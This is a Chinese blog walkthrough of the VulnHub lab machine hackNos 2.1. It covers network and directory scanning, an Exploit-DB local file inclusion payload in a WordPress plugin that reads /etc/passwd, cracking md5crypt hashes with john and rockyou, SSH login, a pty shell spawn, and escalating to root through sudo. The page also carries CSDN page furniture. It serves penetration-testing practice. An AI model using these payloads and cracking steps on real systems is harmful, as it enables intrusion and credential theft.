vulnhub-hacknos-2.1打靶记录

最新推荐文章于 2024-05-30 09:02:27 发布
最新推荐文章于 2024-05-30 09:02:27 发布
阅读量57 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lcc001114/article/details/131191657
版权

靶机地址https://www.vulnhub.com/entry/hacknos-os-hacknos-2,403/#

目标为 普通用户的user.txt和root用户的root.txt

第一步现将我们下载好的靶机导入到VirtualBox中启动靶机  靶机设置为桥接模式kali也一样

 一,信息收集

1,打开我们的kali

使用 arp-scan -l搜索内网或者的主机

 

找到我们的目标靶机ip,

这里有个技巧,通过VirtualBox  >>设置 >>网络 >> 高级 >> 看到靶机的MAC地址,根据MAC地址来找目标靶机ip

 

下一步找到,ip后  使用nmap -sV 192.168.3.19 -O 命令来扫描该ip地址开放的端口   

可以看出  开放的 22 端口和80端口

 2.通过浏览器访问80端口发现为Apache安装默认页面使用dirb进行目录扫描...发现tsweb目录为WordPress站点...

dirb http://192.168.3.19/

得到一个http://192.168.5.133/tsweb/,在浏览器中访问它

二,漏洞扫描/john爆破

1.使用wpscan工具进行漏洞扫描...

wpscan --url http://192.168.3.19/tsweb/ -e ap

 

2. 通过以上的扫描结果到Exploit-DB中进行查找漏洞利用方法,可以查看该漏洞可以查看具有此漏洞机器上的passwd文件内容

发现有漏洞的插件GraceMedia Media Player

https://www.exploit-db.com/exploits/46537     //漏洞地址
The following URL have been confirmed that is vulnerable to local file
inclusion.

Local File Inclusion POC:

GET
/wordpress/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd

V. BUSINESS IMPACT
 

使用上面get以下的路径在浏览器上访问下,把原来的wordpress替换成tsweb。

 将内容

flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:1001:1003::/home/flag:/bin/rbash

复制并保存到本地 test文件中

 3.通过查看passwd文件可以看到flag用户加密值给出来并保存到本地文件中通过john进行破解...

 echo 'flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:1001:1003::/home/flag:/bin/rbash' > test
gunzip /usr/share/wordlists/rockyou.txt.gz
john test --format=md5crypt --wordlist=/usr/share/wordlists/rockyou.txt
 

 三,ssh登录/提权

1.破解flag密码为topsecret并进行SSH登录...并查找passwd文件中使用bash登录的用户为rohit并进行目录遍历发现该用户密码...

ssh flag@192.168.3.19登录

密码为 topsecret

登录之后查看

cd不了可以用这个命令

 

python -c 'import pty;pty.spawn ("/bin/bash")'

cat /etc/passwd | grep bash

将查看到的内容复制到本地 test3文件中
cat /var/backups/passbkp/md5-hash

将这个密码替换掉上面内容中第一个x

 然后保存到文件test2中

也可以用命令

2.对rohit用户进行解密...并获取密码!%hack41 切换到rohit用户...

echo 'rohit:$1$rohit$01Dl0NQKtgfeL08fGrggi0:1000:1000:hackNos:/home/rohit:/bin/bash' > test3
john test3 --format=md5crypt --wordlist=/usr/share/wordlists/rockyou.txt        //进行解码耐心等一下
 

 得到密码 ssh rohit@192.168.3.19  也可以在刚才的 flag用户下输入  su  rohit进行切换用户

3.切换到rohit用户进入家目录发现user.txt发现当前用户具有sudo权限切换并进入到root用户家目录获取root.txt

 

 

 

lcc001114
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
一起打靶-Breach-2-final2.1.xss上线
09-28
一起打靶-Breach-2-final2.1.xss上线
打靶练习vulnhub: my-cmsms
04-10
打靶练习vulnhub: my-cmsms
vulnhub靶机 Os-hackNos-1
qq_52178795的博客
06-16 121
vulnhub靶机 Os-hackNos-1打靶
Vulnhub-Empire靶机-详细打靶流程
woshicainiao666的博客
02-07 453
我有一剑,可搬山,,,,
Vulnhub-Empire靶机-详细打靶流程,通用流行框架大全
m0_60567796的博客
04-18 302
你好朋友,我很高兴你找到了我的秘密目录,我创建了这样的与你分享我的创建SSH私钥文件, 它隐藏在这里的某个地方,这样黑客就不会找到它,也不会用快速通道破解我的密码。看到模块中引用了,os模块,想到通过os.system(“/bin/bash”),新启一个shell,将os.system(“/bin/bash”)加入到webbrowser.py中。看到一个py文件,arsene用户可以在没有passwd的环境下,使用heist.py,就想到在py中新启动一个arsene,shell环境。
vulnhub-DarkHole 1-靶场-打靶记录
lcc001114的博客
06-15 451
这里我们登录进去修改密码点change抓包,发现id=2,咱么大胆猜测一下管理员账户的 id=1, 那么我们尝试抓包越权修改管理员密码。发现第一个无限注册的漏洞(靶场没卵用),后端只校验用户名/邮箱/在数据库重没重复,并没有验证码进行注册限制。接下来用注册好的账号登录,在拦截登录第二个包发现个熟悉的身影adshboard.php并且携带id。更改环境变量,等执行./toto时会执行id,执行id时就会执行我们的/bin/bash。正常来讲应该是成功了,但这却失败了可能是蚁剑的原因,反弹到kali机上试试。
Vulnhub-DC-1实战靶场
ierciyuan的博客
10-12 2423
本次靶场实战涉及信息收集、漏洞查找与利用、getshell、数据库渗透、密码破解、linux提权,并找到官方设计的5个flag。
VulnHub-noob打靶记录
qq_43534481的博客
09-08 312
VulnHub-noob打靶记录 图片隐写 nmap
Hacknos-2.1打靶记录
wwd180的博客
06-13 38
靶机地址目标为 普通用户的user.txt和root用户的root.txt。
VulnHub-Napping打靶记录
qq_43534481的博客
08-24 305
Vulnhub Napping靶场 详细通关记录
VulnHub-Jangow-01-1.0.1打靶记录
qq_43534481的博客
08-21 528
Vulnhub 靶场 jangow打靶记录
打靶练习vulnhub:Insanity-Hosting
03-19
打靶练习vulnhub:Insanity-Hosting
地空战-打靶游戏.rar
04-07
地空战-打靶游戏.rar
易语言地空战-打靶游戏
07-17
易语言地空战-打靶游戏源码,地空战-打靶游戏
登录安全分析报告:小米官网注册
Explinks的博客
05-29 931
图形验证及交互验证方式的安全性到底如何?请看具体分析。
Linux防火墙(以iptables为例)
Tassel_YUE的博客
05-28 994
防火墙是一种网络安全设备,用于监视和控制网络数据流量。其主要功能是在不同网络之间建立一条阻隔,对进出的数据流量进行过滤和筛选,从而保护内部网络免受未经授权的访问和恶意攻击。防火墙通过规则集合控制网络流量的通过与阻止,这些规则可以根据网络策略和需求进行配置。不正确的配置可能导致无法访问特定服务或应用程序。
导线防碰撞警示灯:高压线路安全保障
最新发布
dxzhkj888888的博客
05-30 270
同时,警示灯的反光材料也起到了至关重要的作用,无论是白天还是夜晚,都能将光线反射到最远的距离,让警示效果倍增。导线防碰撞警示灯也叫高压线太阳能警示灯、户外高压线路夜间红色闪光灯,以其独特的设计和卓越的性能,成为了电力安全领域的保障。在广袤的大地上,高压线路如同血脉般纵横交错,然而,在这看似平静的电力输送背后,却隐藏着不容忽视的安全隐患。而到了夜晚,警示灯便开始了它的使命。导线防碰撞警示灯的出现,使得那些驾驶超高车辆、操作超高施工机械的司机们,也在警示灯的提醒下,更加谨慎地行驶和操作,避免了可能发生的危险。
网络学习(九)|深入解析Cookie与Session:高级应用及安全实践
weixin_44435110的博客
05-28 668
通过本以上,后端开发人员可以深入了解Cookie和Session的高级应用、常见问题及其解决方案,有助于设计和实现高效、安全的会话管理系统。
hc-sr04超声波测距加上激光打靶
05-26
激光打靶是一种常见的游戏或者训练方式,通过使用激光发射器和激光接收器来模拟真实射击场景。通常情况下,激光打靶需要先进行目标的定位和距离的测量,这时候HC-SR04超声波测距模块就可以派上用场了。当我们知道...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值